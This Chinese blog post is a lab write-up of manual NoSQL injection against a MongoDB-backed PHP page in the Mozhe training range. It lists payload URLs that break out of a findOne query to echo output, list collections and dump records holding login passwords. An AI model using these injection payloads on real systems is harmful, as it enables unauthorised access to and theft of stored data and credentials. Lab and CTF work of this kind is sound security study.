SQL手工注入MongoDB数据库
2022/1/25 19:08:37
本文主要是介绍SQL手工注入MongoDB数据库,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
MongoDB语法跟其它数据库有所区别
具体参考:https://www.runoob.com/mongodb/mongodb-query.html
环境
墨者靶场 SQL手工注入漏洞测试(MongoDB数据库)
思路
题目代码给出了列名
如果语句这样写/new_list.php?id=1 order by 2
代码接收db.notice.findOne({'id':'1 order by 2'}); return data; 并没有闭合,注入语句无法生效
想办法闭合语句,查看所有集合
注入语句
都是内置函数,注入语句改列名就行
构造简单的链接测回显:/new_list.php?id=1'}); return ({title:1,content:'2
爆库: /new_list.php?id=1'}); return ({title:tojson(db),content:'1
爆表:/new_list.php?id=1'}); return ({title:tojson(db.getCollectionNames()),content:'1
db.getCollectionNames()返回的是数组,需要用tojson转换为字符串,并且mongodb函数区分大小写
爆字段:/new_list.php?id=1'}); return ({title:tojson(db.Authority_confidential.find()[0]),content:'1
db.Authority_confidential是当前用的表,find函数用于查询,0是第一条数据,墨者第二条数据才是登录密码,故而把find()[0]改为find()[1]
这篇关于SQL手工注入MongoDB数据库的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-10-012024年每个初学者都应该知道的Django十大技巧
- 2024-09-30云原生周刊:Argo CD v2.13 发布候选版本丨2024.9.30
- 2024-09-29哪个更快:OpenAI Whisper、Google TTS 还是 Piper TTS??
- 2024-09-29MLOps 端到端系统在 Google 云平台(I):赋能预测解决方案
- 2024-09-26通过 gcloud CLI 认证从本地脚本写入 Google Sheets
- 2024-09-24GoLand 新建项目 Enable vendoring support automatically 的作用是什么?-icode9专业技术文章分享
- 2024-09-21MongoDB资料:新手入门与初级应用指南
- 2024-09-20MongoDB教程:初学者必备指南
- 2024-09-05MongoDB入门:快速掌握NoSQL数据库基础
- 2024-08-28go 项目中怎么打印调试-icode9专业技术文章分享